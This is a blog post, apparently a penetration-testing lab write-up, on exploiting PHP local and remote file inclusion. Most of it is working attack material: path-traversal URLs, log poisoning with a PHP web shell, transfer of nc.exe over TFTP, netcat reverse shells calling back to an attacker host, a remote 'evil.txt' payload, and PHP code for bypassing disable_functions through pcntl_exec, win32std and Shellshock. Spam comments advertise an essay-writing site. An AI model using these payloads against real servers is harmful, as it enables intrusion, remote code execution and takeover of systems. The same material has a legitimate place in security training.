Awakened

Awakened

a technologist and an information security enthusiast

LFI and RFI

2 minute read

LFI happens when an PHP page explicitly calls include function to embed another PHP page, which can be controlled by the attacker. For example, addguestbook.php below include another PHP page that can be chosen depending on the language input:

$lang = $_GET['LANG'];
include( $lang . '.php' );

Because the LANG field can be controlled, the attacker can put in the path to a local or remote file.

1. Local file inclusion (LFI)

a. Reading arbitrary files

Windows hosts file: http://10.11.23.188/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00

b. Contaminating apache log file and executing it

Use netcat to connect to the server and contaminate C:/xampp/apache/logs/access.log file:

root@kali:~# nc -v 10.11.23.188 80
10.11.23.188: inverse host lookup failed: Unknown host
(UNKNOWN) [10.11.23.188] 80 (http) open
 <?php echo shell_exec($_GET['cmd']);?> 
^C

After contamination, the access.log file on the serve is like this:

10.11.0.105 - - [11/Mar/2018:11:24:17 -0400] “GET /addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig HTTP/1.1” 200 369 10.11.0.105 - - [11/Mar/2018:11:24:48 -0400] “ “ 400 366

Display the access.log file to execute the command: http://10.11.23.188/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig

c. Transferring netcat and obtaining reverse shell

Kali:

mkdir /tftp 
atftpd --daemon --port 69 /tftp 
cp /usr/share/windows-binaries/nc.exe /tftp/

Windows:

tftp -i 10.11.0.105 get nc.exe
nc.exe -e cmd.exe 10.11.0.105 4444

Kali:

nc -lvp 4444

Access this URL to open the shell http://10.11.23.188/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444 Note:

python -c 'import pty; pty.spawn("/bin/sh")'

is used to get the TTY shell

2. Remote file inclusion (RFI)

Executing a command via a remote php page: http://10.11.23.188/addguestbook.php?LANG=http://10.11.0.105:31/evil.txt%00

Content of /var/www/html/evil.txt:

<?php echo shell_exec("nc.exe 10.11.0.105 4444 -e cmd.exe") ?>

Most modern php configuration disallows remote file includes of http URIs. For example: xampp/apache/bin/php.ini

allow_url_fopen = Off
allow_url_include = Off

3. Bypass PHP disable_functions

The server admin can disable PHP command execution to enhance the security. In that case, we have to bypass it so that our LFI/RFI attack is meaningful.

a. Use PHP code to download file and list directory

function listDir($dir) {
    if ($handle = opendir($dir)) {
        while (false !== ($entry = readdir($handle))) {
            if ($entry != "." && $entry != "..")
                echo "$entry<br>";
        }
        closedir($handle);
    }
}
function downloadFile($url, $path) {
    unlink($path);
    $file = fopen ($url, 'rb');
    if ($file) {
        $newf = fopen ($path, 'wb');
        if ($newf) {
            while(!feof($file))
                fwrite($newf, fread($file, 1024 * 8), 1024 * 8);
            fclose($file);
        }
        fclose($file);
    }
}

b. PHP 4.2.0+, PHP 5: pcntl_exec

<?php
$cmd = @$_REQUEST[cmd];
if(function_exists('pcntl_exec'))
    die('pcntl not found');

$cmd = $cmd."&pkill -9 bash >out";
pcntl_exec("/bin/bash", $cmd);
echo file_get_contents("out");        
?>

c. PHP 5.2.3: Win32std ext Protections Bypass

<?php
if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //just to be sure that protections work well
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>

d. PHP 5.x: Shellshock

<?php
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
    if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
        $tmp = tempnam(".","data");
        putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
        mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
    }
    else return "Not vuln (not bash)";
    $output = @file_get_contents($tmp);
    @unlink($tmp);
    if($output != "") return $output;
    else return "No output, or not vuln.";
}
?>

4. Deal with missing -e option in netcat

Certain nc version does not provide -e option for us to open a shell session. Workaround by using /bin/sh as below:

<?php
function reverse_shell() {
    echo "Disabled functions: " . ini_get('disable_functions')."\n";
    unlink("/tmp/backpipe");
    echo shellshock("mknod /tmp/backpipe p ");
    echo shellshock("/bin/sh -c '/bin/sh 0</tmp/backpipe | nc 10.11.0.105 4444 1>/tmp/backpipe'");
}
?>

References:

LFI:

  • http://resources.infosecinstitute.com/local-file-inclusion-code-execution/
  • https://www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/
  • https://www.sunnyhoi.com/how-to-hack-a-website-using-local-file-inclusion-lfi/

TTY:

  • http://pentestmonkey.net/blog/post-exploitation-without-a-tty
  • https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Reverse shell:

  • https://highon.coffee/blog/reverse-shell-cheat-sheet/
  • https://netsec.ws/?p=331

PHP disable_functions

  • http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

Netcat missing -e

  • https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/

Categories:

Updated:

Comments

JosephTof

Commerce as a profession essay writing Study of the humanities essay writing Primary education essay writing Security of US borders and Illegal Immigration essay writing Democracy in our country essay writing <a href=https://academic365.site/>write movie reviews online</a> Youth movement essay writing Should you feel guilty about killing zombies Explain essay writing Your favorite poet essay writing The one-act play essay writing How do you propose to spend the long vacation essay writing The spirit of adventure essay writing The green revolution essay writing Nationalism essay writing Commerce as a profession essay writing Life is earnest life is real essay writing Describe the most important relationship in your life essay writing The college magazine essay writing Superstition essay writing Parliamentary democracy essay writing Planning for national reconstruction essay writing https://academic365.site/ professional writing online igcse exam results free term papers and essays writing prompts organic chemistry igcse

write movie reviews online

The choice of professions essay writing Journalism essay writing College sports essay writing If you were going to build the perfect shopping mall what would you include Why essay writing Literature and society essay writing <a href=https://academic365.site/>buy resumes online</a> Teaching children with learning disabilities essay writing The one-act play essay writing The problem of illiteracy in our country essay writing Violence in sport essay writing Peace hath her victories no less renowned than war essay writing Friendship essay writing A college debate essay writing Self-reliance essay writing Charity begins at home essay writing Types of comedy essay writing Romanticism and romantic poetry essay writing Primary education essay writing Why animal testing should be banned essay writing The sorrows and joys of life essay writing Reading as means of education essay writing https://academic365.site/ format for writing a resume reflective essay essay introduction examples how write curriculum vitae definition of essay

Leave a Comment

Your email address will not be published. Required fields are marked *

Markdown is supported.

You May Also Enjoy

RB App Checker

  less than 1 minute read

This tiny yet powerful app lets us check the iOS application for the certificates, requirements and entitlements, embedded provisioning profiles, auxiliary e...

Install a trusted CA in Android N

  1 minute read

It’s very trivial to install a user-trusted certificate on Android. Under Settings -> Security you can install new trusted certificates. However, this cre...

Handy Android code snippets

  less than 1 minute read

This blog post is a memo of handy Android code snippets that I found particularly useful in programming and hacking.

Useful Magisk modules

  less than 1 minute read

MagiskHide Props Config Even on a rooted Android phones, you won’t be able to debug your apps if they are built as non-debuggable. In order to work around th...